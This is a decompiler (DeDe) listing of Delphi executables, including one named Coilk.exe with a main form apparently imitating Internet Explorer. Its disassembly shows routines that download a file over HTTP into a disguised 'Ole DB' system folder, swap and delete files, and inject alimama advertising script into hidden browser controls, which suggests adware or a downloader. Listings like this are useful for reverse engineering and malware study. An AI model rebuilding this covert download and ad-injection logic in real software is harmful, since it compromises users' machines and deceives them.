* Reference to control Tfrm_SSMoon.Webb : TWebBrowser
|
004BC5F9 8B8370030000 mov eax, [ebx+$0370]
* Reference to : TWebBrowser._PROC_00470464()
|
004BC5FF E8603EFBFF call 00470464
004BC604 8D45F4 lea eax, [ebp-$0C]
004BC607 8B15D8644C00 mov edx, [$004C64D8]
004BC60D 8B12 mov edx, [edx]
|
004BC60F E84898F4FF call 00405E5C
004BC614 8B55F4 mov edx, [ebp-$0C]
* Reference to control Tfrm_SSMoon.webb2 : TWebBrowser
|
004BC617 8B8374030000 mov eax, [ebx+$0374]
* Reference to : TWebBrowser._PROC_00470464()
|
004BC61D E8423EFBFF call 00470464
004BC622 33C0 xor eax, eax
004BC624 5A pop edx
004BC625 59 pop ecx
004BC626 59 pop ecx
004BC627 648910 mov fs:[eax], edx
****** FINALLY
|
* Possible String Reference to: '[嬪]?
|
004BC62A 684CC64B00 push $004BC64C
004BC62F 8D45F4 lea eax, [ebp-$0C]
004BC632 BA02000000 mov edx, $00000002
|
004BC637 E8D896F4FF call 00405D14
004BC63C 8D45FC lea eax, [ebp-$04]
|
004BC63F E8B08EF4FF call 004054F4
004BC644 C3 ret
|
004BC645 E99286F4FF jmp 00404CDC
004BC64A EBE3 jmp 004BC62F
****** END
|
004BC64C 5B pop ebx
004BC64D 8BE5 mov esp, ebp
004BC64F 5D pop ebp
004BC650 C3 ret
*)
end;
procedure Tfrm_SSMoon._PROC_004BC843(Sender : TObject);
begin
(*
004BC843 0025442C33CB add [$CB332C44], ah
004BC849 26D011 rcl byte ptr es:[ecx], 1
004BC84C B483 mov ah, $83
004BC84E 00C0 add al, al
004BC850 4F dec edi
004BC851 D901 fld dword ptr [ecx]
004BC853 1927 sbb [edi], esp
004BC855 44 inc esp
004BC856 2C33 sub al, $33
004BC858 CB ret
*)
end;
procedure Tfrm_SSMoon._PROC_004BC859(Sender : TObject);
begin
(*
004BC859 26D011 rcl byte ptr es:[ecx], 1
004BC85C B483 mov ah, $83
004BC85E 00C0 add al, al
004BC860 4F dec edi
004BC861 D901 fld dword ptr [ecx]
004BC863 19FF sbb edi, edi
004BC865 FFFF DB $FF, $FF //
004BC867 FF36 push dword ptr [esi]
004BC869 0000 add [eax], al
*)
end;
procedure Tfrm_SSMoon._PROC_004BCA70(Sender : TObject);
begin
(*
004BCA70 55 push ebp
004BCA71 8BEC mov ebp, esp
004BCA73 81C42CFEFFFF add esp, $FFFFFE2C
004BCA79 53 push ebx
004BCA7A 33D2 xor edx, edx
004BCA7C 8955FC mov [ebp-$04], edx
004BCA7F 33C0 xor eax, eax
004BCA81 55 push ebp
* Possible String Reference to: '榈€?腽[嬪]?
|
004BCA82 6822CC4B00 push $004BCC22
***** TRY
|
004BCA87 64FF30 push dword ptr fs:[eax]
004BCA8A 648920 mov fs:[eax], esp
004BCA8D A1D8644C00 mov eax, dword ptr [$004C64D8]
004BCA92 8B00 mov eax, [eax]
|
004BCA94 E8B3DCF4FF call 0040A74C
004BCA99 84C0 test al, al
004BCA9B 7425 jz 004BCAC2
004BCA9D 8B1DD8644C00 mov ebx, [$004C64D8]
004BCAA3 8B1B mov ebx, [ebx]
004BCAA5 899D2CFEFFFF mov [ebp+$FFFFFE2C], ebx
004BCAAB 8B852CFEFFFF mov eax, [ebp+$FFFFFE2C]
|
004BCAB1 E8CE8EF4FF call 00405984
004BCAB6 50 push eax
* Reference to: kernel32.DeleteFileA()
|
004BCAB7 E8D4B0F4FF call 00407B90
004BCABC 83F801 cmp eax, +$01
004BCABF 1BC0 sbb eax, eax
004BCAC1 40 inc eax
004BCAC2 8B15D8644C00 mov edx, [$004C64D8]
004BCAC8 8B12 mov edx, [edx]
004BCACA 8D8530FEFFFF lea eax, [ebp+$FFFFFE30]
|
004BCAD0 E8BF6CF4FF call 00403794
004BCAD5 8D8530FEFFFF lea eax, [ebp+$FFFFFE30]
|
004BCADB E8446AF4FF call 00403524
|
004BCAE0 E80766F4FF call 004030EC
* Possible String Reference to: '<html><body><script type='text/java
| script'>alimama_pid='mm_'
|
004BCAE5 6838CC4B00 push $004BCC38
004BCAEA A1E4664C00 mov eax, dword ptr [$004C66E4]
004BCAEF FF30 push dword ptr [eax]
* Possible String Reference to: '_0_0';'
|
004BCAF1 6880CC4B00 push $004BCC80
004BCAF6 6890CC4B00 push $004BCC90
004BCAFB 689CCC4B00 push $004BCC9C
* Possible String Reference to: 'alimama_type='g';'
|
004BCB00 68A8CC4B00 push $004BCCA8
004BCB05 6890CC4B00 push $004BCC90
004BCB0A 689CCC4B00 push $004BCC9C
* Possible String Reference to: 'alimama_tks={};'
|
004BCB0F 68C4CC4B00 push $004BCCC4
004BCB14 6890CC4B00 push $004BCC90
004BCB19 689CCC4B00 push $004BCC9C
* Possible String Reference to: 'alimama_tks.style_i=1;'
|
004BCB1E 68DCCC4B00 push $004BCCDC
004BCB23 6890CC4B00 push $004BCC90
004BCB28 689CCC4B00 push $004BCC9C
* Possible String Reference to: 'alimama_tks.lg_i=1;'
|
004BCB2D 68FCCC4B00 push $004BCCFC
004BCB32 6890CC4B00 push $004BCC90
004BCB37 689CCC4B00 push $004BCC9C
* Possible String Reference to: 'alimama_tks.w_i=572;'
|
004BCB3C 6818CD4B00 push $004BCD18
004BCB41 6890CC4B00 push $004BCC90
004BCB46 689CCC4B00 push $004BCC9C
* Possible String Reference to: 'alimama_tks.h_i=45;'
|
004BCB4B 6838CD4B00 push $004BCD38
004BCB50 6890CC4B00 push $004BCC90
004BCB55 689CCC4B00 push $004BCC9C
* Possible String Reference to: 'alimama_tks.btn_i=1;'
|
004BCB5A 6854CD4B00 push $004BCD54
004BCB5F 6890CC4B00 push $004BCC90
004BCB64 689CCC4B00 push $004BCC9C
* Possible String Reference to: 'alimama_tks.txt_s='';'
|
004BCB69 6874CD4B00 push $004BCD74
004BCB6E 6890CC4B00 push $004BCC90
004BCB73 689CCC4B00 push $004BCC9C
* Possible String Reference to: 'alimama_tks.hot_i=0;'
|
004BCB78 6894CD4B00 push $004BCD94
004BCB7D 6890CC4B00 push $004BCC90
004BCB82 689CCC4B00 push $004BCC9C
* Possible String Reference to: 'alimama_tks.hc_c='#999999';'
|
004BCB87 68B4CD4B00 push $004BCDB4
004BCB8C 6890CC4B00 push $004BCC90
004BCB91 689CCC4B00 push $004BCC9C
* Possible String Reference to: 'alimama_tks.c_i=1;'
|
004BCB96 68D8CD4B00 push $004BCDD8
004BCB9B 6890CC4B00 push $004BCC90
004BCBA0 689CCC4B00 push $004BCC9C
* Possible String Reference to: 'alimama_tks.cid_i=0;'
|
004BCBA5 68F4CD4B00 push $004BCDF4
004BCBAA 6890CC4B00 push $004BCC90
004BCBAF 689CCC4B00 push $004BCC9C
* Possible String Reference to: '</script>'
|
004BCBB4 6814CE4B00 push $004BCE14
004BCBB9 6890CC4B00 push $004BCC90
004BCBBE 689CCC4B00 push $004BCC9C
* Possible String Reference to: '<script type='text/javascript' src=
| 'http://a.alimama.cn/inf.js'></scri
| pt>'
|
004BCBC3 6828CE4B00 push $004BCE28
004BCBC8 6890CC4B00 push $004BCC90
004BCBCD 689CCC4B00 push $004BCC9C
* Possible String Reference to: '</body></html>'
|
004BCBD2 687CCE4B00 push $004BCE7C
004BCBD7 8D45FC lea eax, [ebp-$04]
004BCBDA BA30000000 mov edx, $00000030
|
004BCBDF E8A48CF4FF call 00405888
004BCBE4 8B55FC mov edx, [ebp-$04]
004BCBE7 8D8530FEFFFF lea eax, [ebp+$FFFFFE30]
|
004BCBED E8B290F4FF call 00405CA4
|
004BCBF2 E89572F4FF call 00403E8C
|
004BCBF7 E8F064F4FF call 004030EC
004BCBFC 8D8530FEFFFF lea eax, [ebp+$FFFFFE30]
|
004BCC02 E8556CF4FF call 0040385C
|
004BCC07 E8E064F4FF call 004030EC
004BCC0C 33C0 xor eax, eax
004BCC0E 5A pop edx
004BCC0F 59 pop ecx
004BCC10 59 pop ecx
004BCC11 648910 mov fs:[eax], edx
****** FINALLY
|
* Possible String Reference to: '[嬪]?
|
004BCC14 6829CC4B00 push $004BCC29
004BCC19 8D45FC lea eax, [ebp-$04]
|
004BCC1C E8D388F4FF call 004054F4
004BCC21 C3 ret
|
004BCC22 E9B580F4FF jmp 00404CDC
004BCC27 EBF0 jmp 004BCC19
****** END
|
004BCC29 5B pop ebx
004BCC2A 8BE5 mov esp, ebp
004BCC2C 5D pop ebp
004BCC2D C3 ret
*)
end;
procedure Tfrm_SSMoon._PROC_004BCE8D(Sender : TObject);
begin
(*
004BCE8D 8BEC mov ebp, esp
004BCE8F 51 push ecx
004BCE90 53 push ebx
004BCE91 56 push esi
004BCE92 57 push edi
004BCE93 8BF2 mov esi, edx
004BCE95 8BD8 mov ebx, eax
004BCE97 B201 mov dl, $01
* Reference to class TMemoryStream
|
004BCE99 A1ACAD4100 mov eax, dword ptr [$0041ADAC]
|
004BCE9E E87576F4FF call 00404518
004BCEA3 8945FC mov [ebp-$04], eax
004BCEA6 33C0 xor eax, eax
004BCEA8 55 push ebp
004BCEA9 68F2CE4B00 push $004BCEF2
***** TRY
|
004BCEAE 64FF30 push dword ptr fs:[eax]
004BCEB1 648920 mov fs:[eax], esp
004BCEB4 6A00 push $00
004BCEB6 6A00 push $00
004BCEB8 8BC3 mov eax, ebx
|
004BCEBA E85927F6FF call 0041F618
004BCEBF 8BC3 mov eax, ebx
004BCEC1 8B10 mov edx, [eax]
004BCEC3 FF12 call dword ptr [edx]
004BCEC5 52 push edx
004BCEC6 50 push eax
004BCEC7 8BD3 mov edx, ebx
004BCEC9 8B45FC mov eax, [ebp-$04]
|
004BCECC E8C329F6FF call 0041F894
004BCED1 8D45FC lea eax, [ebp-$04]
|
004BCED4 E89B55FFFF call 004B2474
004BCED9 85C0 test eax, eax
004BCEDB 0F9FC3 setnle bl
004BCEDE 8BD6 mov edx, esi
004BCEE0 8B45FC mov eax, [ebp-$04]
|
004BCEE3 E82C2EF6FF call 0041FD14
004BCEE8 33C0 xor eax, eax
004BCEEA 5A pop edx
004BCEEB 59 pop ecx
004BCEEC 59 pop ecx
004BCEED 648910 mov fs:[eax], edx
004BCEF0 EB0C jmp 004BCEFE
|
004BCEF2 E9317BF4FF jmp 00404A28
004BCEF7 33DB xor ebx, ebx
|
004BCEF9 E83A7FF4FF call 00404E38
****** END
|
004BCEFE 8B45FC mov eax, [ebp-$04]
|
004BCF01 E84276F4FF call 00404548
004BCF06 8BC3 mov eax, ebx
004BCF08 5F pop edi
004BCF09 5E pop esi
004BCF0A 5B pop ebx
004BCF0B 59 pop ecx
004BCF0C 5D pop ebp
004BCF0D C3 ret
*)
end;
procedure Tfrm_SSMoon._PROC_004BCF10(Sender : TObject);
begin
(*
004BCF10 55 push ebp
004BCF11 8BEC mov ebp, esp
004BCF13 B906000000 mov ecx, $00000006
004BCF18 6A00 push $00
004BCF1A 6A00 push $00
004BCF1C 49 dec ecx
004BCF1D 75F9 jnz 004BCF18
004BCF1F 51 push ecx
004BCF20 53 push ebx
004BCF21 56 push esi
004BCF22 57 push edi
004BCF23 8955FC mov [ebp-$04], edx
004BCF26 8BF0 mov esi, eax
004BCF28 8B45FC mov eax, [ebp-$04]
|
004BCF2B E8448AF4FF call 00405974
004BCF30 33C0 xor eax, eax
004BCF32 55 push ebp
* Possible String Reference to: '閺{?肷嬅_^[嬪]?'
|
004BCF33 6848D14B00 push $004BD148
***** TRY
|
004BCF38 64FF30 push dword ptr fs:[eax]
004BCF3B 648920 mov fs:[eax], esp
004BCF3E B301 mov bl, $01
004BCF40 8D45F4 lea eax, [ebp-$0C]
004BCF43 50 push eax
004BCF44 8D55E8 lea edx, [ebp-$18]
004BCF47 33C0 xor eax, eax
|
004BCF49 E82E64F4FF call 0040337C
004BCF4E 8B45E8 mov eax, [ebp-$18]
004BCF51 8D55EC lea edx, [ebp-$14]
|
004BCF54 E8D7D9F4FF call 0040A930
004BCF59 8B45EC mov eax, [ebp-$14]
004BCF5C B903000000 mov ecx, $00000003
004BCF61 BA01000000 mov edx, $00000001
|
004BCF66 E8818AF4FF call 004059EC
004BCF6B A168624C00 mov eax, dword ptr [$004C6268]
004BCF70 803806 cmp byte ptr [eax], $06
004BCF73 740A jz 004BCF7F
004BCF75 A168624C00 mov eax, dword ptr [$004C6268]
004BCF7A 803807 cmp byte ptr [eax], $07
004BCF7D 7525 jnz 004BCFA4
004BCF7F 8D45E0 lea eax, [ebp-$20]
* Reference to : TWebBrowser._PROC_00470A04()
|
004BCF82 E87D3AFBFF call 00470A04
004BCF87 8B45E0 mov eax, [ebp-$20]
004BCF8A 8D55E4 lea edx, [ebp-$1C]
|
004BCF8D E89ED9F4FF call 0040A930
004BCF92 8B55E4 mov edx, [ebp-$1C]
004BCF95 8D45F8 lea eax, [ebp-$08]
* Possible String Reference to: 'tmp333.tmp'
|
004BCF98 B960D14B00 mov ecx, $004BD160
|
004BCF9D E86A88F4FF call 0040580C
004BCFA2 EB1A jmp 004BCFBE
004BCFA4 FF75F4 push dword ptr [ebp-$0C]
* Possible String Reference to: 'Program Files\Common Files\System\O
| le DB\'
|
004BCFA7 6874D14B00 push $004BD174
* Possible String Reference to: 'tmp333.tmp'
|
004BCFAC 6860D14B00 push $004BD160
004BCFB1 8D45F8 lea eax, [ebp-$08]
004BCFB4 BA03000000 mov edx, $00000003
|
004BCFB9 E8CA88F4FF call 00405888
004BCFBE 68FFFF0000 push $0000FFFF
004BCFC3 8B4DF8 mov ecx, [ebp-$08]
004BCFC6 B201 mov dl, $01
* Reference to class TFileStream
|
004BCFC8 A1A8AC4100 mov eax, dword ptr [$0041ACA8]
|
004BCFCD E8DA2AF6FF call 0041FAAC
004BCFD2 8945F0 mov [ebp-$10], eax
004BCFD5 33C0 xor eax, eax
004BCFD7 55 push ebp
004BCFD8 68FECF4B00 push $004BCFFE
***** TRY
|
004BCFDD 64FF30 push dword ptr fs:[eax]
004BCFE0 648920 mov fs:[eax], esp
* Reference to control Tfrm_SSMoon.IdHTTP : TIdHTTP
|
004BCFE3 8B866C030000 mov eax, [esi+$036C]
004BCFE9 8B4DF0 mov ecx, [ebp-$10]
004BCFEC 8B55FC mov edx, [ebp-$04]
|
004BCFEF E8A082FDFF call 00495294
004BCFF4 33C0 xor eax, eax
004BCFF6 5A pop edx
004BCFF7 59 pop ecx
004BCFF8 59 pop ecx
004BCFF9 648910 mov fs:[eax], edx
004BCFFC EB2C jmp 004BD02A
|
004BCFFE E9257AF4FF jmp 00404A28
004BD003 8B45F0 mov eax, [ebp-$10]
|
004BD006 E83D75F4FF call 00404548
004BD00B 8B45F8 mov eax, [ebp-$08]
|
004BD00E E87189F4FF call 00405984
004BD013 50 push eax
* Reference to: kernel32.DeleteFileA()
|
004BD014 E877ABF4FF call 00407B90
004BD019 33DB xor ebx, ebx
|
004BD01B E8187EF4FF call 00404E38
004BD020 E9E6000000 jmp 004BD10B
|
004BD025 E80E7EF4FF call 00404E38
****** END
|
004BD02A 8B3548624C00 mov esi, [$004C6248]
004BD030 8B36 mov esi, [esi]
004BD032 8B1548624C00 mov edx, [$004C6248]
004BD038 8B12 mov edx, [edx]
004BD03A 8D45DC lea eax, [ebp-$24]
* Possible String Reference to: '111'
|
004BD03D B9A8D14B00 mov ecx, $004BD1A8
|
004BD042 E8C587F4FF call 0040580C
004BD047 8B7DDC mov edi, [ebp-$24]
004BD04A 897DD8 mov [ebp-$28], edi
004BD04D 8B45D8 mov eax, [ebp-$28]
|
004BD050 E82F89F4FF call 00405984
004BD055 50 push eax
004BD056 8975D4 mov [ebp-$2C], esi
004BD059 8B45D4 mov eax, [ebp-$2C]
|
004BD05C E82389F4FF call 00405984
004BD061 50 push eax
* Reference to: kernel32.MoveFileA()
|
004BD062 E8F1ACF4FF call 00407D58
004BD067 83F801 cmp eax, +$01
004BD06A 1BC0 sbb eax, eax
004BD06C 40 inc eax
004BD06D 8B1548624C00 mov edx, [$004C6248]
004BD073 8B12 mov edx, [edx]
004BD075 8B45F0 mov eax, [ebp-$10]
|
004BD078 E80FFEFFFF call 004BCE8C
004BD07D 84C0 test al, al
004BD07F 7431 jz 004BD0B2
004BD081 8B1548624C00 mov edx, [$004C6248]
004BD087 8B12 mov edx, [edx]
004BD089 8D45D0 lea eax, [ebp-$30]
* Possible String Reference to: '111'
|
004BD08C B9A8D14B00 mov ecx, $004BD1A8
|
004BD091 E87687F4FF call 0040580C
004BD096 8B75D0 mov esi, [ebp-$30]
004BD099 8975D8 mov [ebp-$28], esi
004BD09C 8B45D8 mov eax, [ebp-$28]
|
004BD09F E8E088F4FF call 00405984
004BD0A4 50 push eax
* Reference to: kernel32.DeleteFileA()
|
004BD0A5 E8E6AAF4FF call 00407B90
004BD0AA 83F801 cmp eax, +$01
004BD0AD 1BC0 sbb eax, eax
004BD0AF 40 inc eax
004BD0B0 EB43 jmp 004BD0F5
004BD0B2 8B1548624C00 mov edx, [$004C6248]
004BD0B8 8B12 mov edx, [edx]
004BD0BA 8D45CC lea eax, [ebp-$34]
* Possible String Reference to: '111'
|
004BD0BD B9A8D14B00 mov ecx, $004BD1A8
|
004BD0C2 E84587F4FF call 0040580C
004BD0C7 8B75CC mov esi, [ebp-$34]
004BD0CA 8B3D48624C00 mov edi, [$004C6248]
004BD0D0 8B3F mov edi, [edi]
004BD0D2 897DD8 mov [ebp-$28], edi
004BD0D5 8B45D8 mov eax, [ebp-$28]
|
004BD0D8 E8A788F4FF call 00405984
004BD0DD 50 push eax
004BD0DE 8975D4 mov [ebp-$2C], esi
004BD0E1 8B45D4 mov eax, [ebp-$2C]
|
004BD0E4 E89B88F4FF call 00405984
004BD0E9 50 push eax
* Reference to: kernel32.MoveFileA()
|
004BD0EA E869ACF4FF call 00407D58
004BD0EF 83F801 cmp eax, +$01
004BD0F2 1BC0 sbb eax, eax
004BD0F4 40 inc eax
004BD0F5 8B45F0 mov eax, [ebp-$10]
|
004BD0F8 E84B74F4FF call 00404548
004BD0FD 8B45F8 mov eax, [ebp-$08]
|
004BD100 E87F88F4FF call 00405984
004BD105 50 push eax
* Reference to: kernel32.DeleteFileA()
|
004BD106 E885AAF4FF call 00407B90
004BD10B 33C0 xor eax, eax
004BD10D 5A pop edx
004BD10E 59 pop ecx
004BD10F 59 pop ecx
004BD110 648910 mov fs:[eax], edx
****** FINALLY
|
* Possible String Reference to: '嬅_^[嬪]?'
|
004BD113 684FD14B00 push $004BD14F
004BD118 8D45CC lea eax, [ebp-$34]
004BD11B BA02000000 mov edx, $00000002
|
004BD120 E8F383F4FF call 00405518
004BD125 8D45DC lea eax, [ebp-$24]
|
004BD128 E8C783F4FF call 004054F4
004BD12D 8D45E0 lea eax, [ebp-$20]
004BD130 BA04000000 mov edx, $00000004
|
004BD135 E8DE83F4FF call 00405518
004BD13A 8D45F4 lea eax, [ebp-$0C]
004BD13D BA03000000 mov edx, $00000003
|
004BD142 E8D183F4FF call 00405518
004BD147 C3 ret
|
004BD148 E98F7BF4FF jmp 00404CDC
004BD14D EBC9 jmp 004BD118
****** END
|
004BD14F 8BC3 mov eax, ebx
004BD151 5F pop edi
004BD152 5E pop esi
004BD153 5B pop ebx
004BD154 8BE5 mov esp, ebp
004BD156 5D pop ebp
004BD157 C3 ret
*)
end;
procedure Tfrm_SSMoon._PROC_004BD43C(Sender : TObject);
begin
(*
004BD43C 55 push ebp
004BD43D 8BEC mov ebp, esp
004BD43F 33C9 xor ecx, ecx
004BD441 51 push ecx
004BD442 51 push ecx
004BD443 51 push ecx
004BD444 51 push ecx
004BD445 53 push ebx
004BD446 56 push esi
004BD447 57 push edi
004BD448 8BD8 mov ebx, eax
004BD44A 33C0 xor eax, eax
004BD44C 55 push ebp
* Possible String Reference to: '镸w?脬_^[嬪]胐Bat1'
|
004BD44D 688AD54B00 push $004BD58A
***** TRY
|
004BD452 64FF30 push dword ptr fs:[eax]
004BD455 648920 mov fs:[eax], esp
* Reference to field Tfrm_SSMoon.OFFS_0394
|
004BD458 8B8394030000 mov eax, [ebx+$0394]
004BD45E 85C0 test eax, eax
004BD460 740D jz 004BD46F
|
004BD462 E88169F6FF call 00423DE8
004BD467 33C0 xor eax, eax
* Reference to field Tfrm_SSMoon.OFFS_0394
|
004BD469 898394030000 mov [ebx+$0394], eax
004BD46F BAE0930400 mov edx, $000493E0
* Reference to control Tfrm_SSMoon.ti_ZipMemory : TTimer
|
004BD474 8B8360030000 mov eax, [ebx+$0360]
* Reference to : TPanel._PROC_00437CDC()
|
004BD47A E85DA8F7FF call 00437CDC
004BD47F B201 mov dl, $01
* Reference to control Tfrm_SSMoon.ti_ZipMemory : TTimer
|
004BD481 8B8360030000 mov eax, [ebx+$0360]
* Reference to : TPanel._PROC_00437CCC()
|
004BD487 E840A8F7FF call 00437CCC
004BD48C 8BC3 mov eax, ebx
|
004BD48E E831F1FFFF call 004BC5C4
004BD493 8D45F4 lea eax, [ebp-$0C]
* Reference to : TWebBrowser._PROC_00470A04()
|
004BD496 E86935FBFF call 00470A04
004BD49B 8B45F4 mov eax, [ebp-$0C]
004BD49E 8D55F8 lea edx, [ebp-$08]
|
004BD4A1 E88AD4F4FF call 0040A930
004BD4A6 8B45F8 mov eax, [ebp-$08]
004BD4A9 8D55FC lea edx, [ebp-$04]
|
004BD4AC E85F37FBFF call 00470C10
004BD4B1 8B45FC mov eax, [ebp-$04]
|
004BD4B4 E8CB84F4FF call 00405984
004BD4B9 8BF8 mov edi, eax
004BD4BB 57 push edi
004BD4BC 6A00 push $00
* Possible String Reference to: 'dBat1'
|
004BD4BE 6898D54B00 push $004BD598
* Possible String Reference to: 'DRV'
|
004BD4C3 68A0D54B00 push $004BD5A0
* Reference to: kernel32.GetPrivateProfileIntA()
|
004BD4C8 E8BBA7F4FF call 00407C88
004BD4CD 8BF0 mov esi, eax
004BD4CF 8BC6 mov eax, esi
004BD4D1 99 cdq
004BD4D2 52 push edx
004BD4D3 50 push eax
|
004BD4D4 E867F1F4FF call 0040C640
|
004BD4D9 E8A25FF4FF call 00403480
004BD4DE 290424 sub dword ptr [esp], eax
004BD4E1 19542404 sbb [esp+$04], edx
004BD4E5 58 pop eax
004BD4E6 5A pop edx
004BD4E7 85D2 test edx, edx
004BD4E9 7D07 jnl 004BD4F2
004BD4EB F7D8 neg eax
004BD4ED 83D200 adc edx, +$00
004BD4F0 F7DA neg edx
004BD4F2 83FA00 cmp edx, +$00
004BD4F5 7507 jnz 004BD4FE
004BD4F7 83F803 cmp eax, +$03
004BD4FA 7645 jbe 004BD541
004BD4FC EB02 jmp 004BD500
004BD4FE 7E41 jle 004BD541
* Reference to field Tfrm_SSMoon.OFFS_0388
|
004BD500 8B8388030000 mov eax, [ebx+$0388]
004BD506 8B5024 mov edx, [eax+$24]
004BD509 8BC3 mov eax, ebx
* Reference to : Tfrm_SSMoon._PROC_004BCF10()
|
004BD50B E800FAFFFF call 004BCF10
004BD510 84C0 test al, al
004BD512 742D jz 004BD541
004BD514 57 push edi
|
004BD515 E826F1F4FF call 0040C640
|
004BD51A E8615FF4FF call 00403480
004BD51F 52 push edx
004BD520 50 push eax
004BD521 8D45F0 lea eax, [ebp-$10]
|
004BD524 E8CFCDF4FF call 0040A2F8
004BD529 8B45F0 mov eax, [ebp-$10]
|
004BD52C E85384F4FF call 00405984
004BD531 50 push eax
* Possible String Reference to: 'dBat1'
|
004BD532 6898D54B00 push $004BD598
* Possible String Reference to: 'DRV'
|
004BD537 68A0D54B00 push $004BD5A0
* Reference to: kernel32.WritePrivateProfileStringA()
|
004BD53C E8BFA8F4FF call 00407E00
004BD541 8BC3 mov eax, ebx
|
004BD543 E85824F9FF call 0044F9A0
004BD548 8BC8 mov ecx, eax
004BD54A B201 mov dl, $01
* Reference to class TTaskThread
|
004BD54C A118D64B00 mov eax, dword ptr [$004BD618]
|
004BD551 E822010000 call 004BD678
004BD556 8B1584644C00 mov edx, [$004C6484]
004BD55C 8902 mov [edx], eax
004BD55E 33D2 xor edx, edx
004BD560 8BC3 mov eax, ebx
* Reference to : Tfrm_SSMoon.ti_ZipMemoryTimer()
|
004BD562 E855FCFFFF call 004BD1BC
004BD567 33C0 xor eax, eax
004BD569 5A pop edx
004BD56A 59 pop ecx
004BD56B 59 pop ecx
004BD56C 648910 mov fs:[eax], edx
****** FINALLY
|
* Possible String Reference to: '_^[嬪]胐Bat1'
|
004BD56F 6891D54B00 push $004BD591
004BD574 8D45F0 lea eax, [ebp-$10]
004BD577 BA03000000 mov edx, $00000003
|
004BD57C E8977FF4FF call 00405518
004BD581 8D45FC lea eax, [ebp-$04]
|
004BD584 E86B7FF4FF call 004054F4
004BD589 C3 ret
|
004BD58A E94D77F4FF jmp 00404CDC
004BD58F EBE3 jmp 004BD574
****** END
|
004BD591 5F pop edi
004BD592 5E pop esi
004BD593 5B pop ebx
004BD594 8BE5 mov esp, ebp
004BD596 5D pop ebp
004BD597 C3 ret
*)
end;
procedure Tfrm_SSMoon._PROC_004BD598(Sender : TObject);
begin
(*
004BD598 6442 inc edx
004BD59A 61 popa
004BD59B 7431 jz 004BD5CE
004BD59D 0000 add [eax], al
004BD59F 00445256 add [edx+edx*2+$56], al
004BD5A3 00E8 add al, ch
004BD5A5 5F pop edi
004BD5A6 E7FF out $FF, eax
004BD5A8 FFC3 inc ebx
004BD5AA 8BC0 mov eax, eax
004BD5AC 55 push ebp
004BD5AD 8BEC mov ebp, esp
004BD5AF 33C0 xor eax, eax
004BD5B1 55 push ebp
* Possible String Reference to: '槿v?滕]胐諯'
|
004BD5B2 680FD64B00 push $004BD60F
***** TRY
|
004BD5B7 64FF30 push dword ptr fs:[eax]
004BD5BA 648920 mov fs:[eax], esp
004BD5BD FF0570DD4C00 inc dword ptr [$004CDD70]
004BD5C3 753C jnz 004BD601
004BD5C5 B85CDD4C00 mov eax, $004CDD5C
|
004BD5CA E86D9CF4FF call 0040723C
004BD5CF B860DD4C00 mov eax, $004CDD60
|
004BD5D4 E8639CF4FF call 0040723C
004BD5D9 B864DD4C00 mov eax, $004CDD64
|
004BD5DE E8599CF4FF call 0040723C
004BD5E3 B868DD4C00 mov eax, $004CDD68
|
004BD5E8 E8077FF4FF call 004054F4
004BD5ED B86CDD4C00 mov eax, $004CDD6C
|
004BD5F2 E8FD7EF4FF call 004054F4
004BD5F7 B874DD4C00 mov eax, $004CDD74
|
004BD5FC E8F37EF4FF call 004054F4
004BD601 33C0 xor eax, eax
004BD603 5A pop edx
004BD604 59 pop ecx
004BD605 59 pop ecx
004BD606 648910 mov fs:[eax], edx
****** FINALLY
|
* Possible String Reference to: ']胐諯'
|
004BD609 6816D64B00 push $004BD616
004BD60E C3 ret
*)
end;
procedure Tfrm_SSMoon._PROC_004BD60F(Sender : TObject);
begin
(*
|
004BD60F E9C876F4FF jmp 00404CDC
|
004BD614 EBF8 jmp 004BD60E
004BD616 5D pop ebp
004BD617 C3 ret
*)
end;
procedure Tfrm_SSMoon._PROC_004BD618(Sender : TObject);
begin
(*
004BD618 64D6 DB $64, $D6 //
004BD61A 4B dec ebx
004BD61B 0000 add [eax], al
*)
end;
end.
Coilk.exe
unit UMain;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics,
Controls, Forms, Dialogs, StdCtrls
type
Tfrm_IExplcreMain=class(TForm)
Timer1: TTimer;
Timer2: TTimer;
IdHTTP: TIdHTTP;
Timer3: TTimer;
Timer4: TTimer;
Timer5: TTimer;
RzStringGrid1: TRzStringGrid;
ButtonGroup1: TButtonGroup;
procedure FormCreate(Sender : TObject);
procedure FormClose(Sender : TObject);
procedure Timer1Timer(Sender : TObject);
procedure FormShow(Sender : TObject);
procedure FormActivate(Sender : TObject);
procedure Timer2Timer(Sender : TObject);
procedure Timer3Timer(Sender : TObject);
procedure Timer4Timer(Sender : TObject);
procedure Timer5Timer(Sender : TObject);
private
{ Private declarations }
public
{ Public declarations }
end ;
var
frm_IExplcreMain: Tfrm_IExplcreMain;
{This file is generated by DeDe Ver 3.50.02 Copyright (c) 1999-2002 DaFixer}
implementation
{$R *.DFM}
procedure Tfrm_IExplcreMain.FormCreate(Sender : TObject);
begin
(*
004A0DC8 55 push ebp
004A0DC9 8BEC mov ebp, esp
004A0DCB 81C488FEFFFF add esp, $FFFFFE88
004A0DD1 53 push ebx
004A0DD2 56 push esi
004A0DD3 33C9 xor ecx, ecx
004A0DD5 898D88FEFFFF mov [ebp+$FFFFFE88], ecx
004A0DDB 898D98FEFFFF mov [ebp+$FFFFFE98], ecx
004A0DE1 898D94FEFFFF mov [ebp+$FFFFFE94], ecx
004A0DE7 898D90FEFFFF mov [ebp+$FFFFFE90], ecx
004A0DED 898D8CFEFFFF mov [ebp+$FFFFFE8C], ecx
004A0DF3 898D9CFEFFFF mov [ebp+$FFFFFE9C], ecx
004A0DF9 8BD8 mov ebx, eax
004A0DFB 8D85A0FEFFFF lea eax, [ebp+$FFFFFEA0]
* Reference to object TSearchRec
|
004A0E01 8B156C834000 mov edx, [$0040836C]
|
004A0E07 E8B44CF6FF call 00405AC0
004A0E0C 33C0 xor eax, eax
004A0E0E 55 push ebp
* Possible String Reference to: '閰8?胱^[嬪]?
|
004A0E0F 6812104A00 push $004A1012
***** TRY
|
004A0E14 64FF30 push dword ptr fs:[eax]
004A0E17 648920 mov fs:[eax], esp
* Reference to pointer to GlobalVar_004ACCD4
|
004A0E1A A1DC6A4A00 mov eax, dword ptr [$004A6ADC]
004A0E1F C60000 mov byte ptr [eax], $00
* Reference to: kernel32.GetCurrentProcess()
|
004A0E22 E82966F6FF call 00407450
* Reference to field Tfrm_IExplcreMain.OFFS_0388
|
004A0E27 898388030000 mov [ebx+$0388], eax
004A0E2D 6AEC push $EC
004A0E2F 8BC3 mov eax, ebx
|
004A0E31 E8EA3AFAFF call 00444920
004A0E36 50 push eax
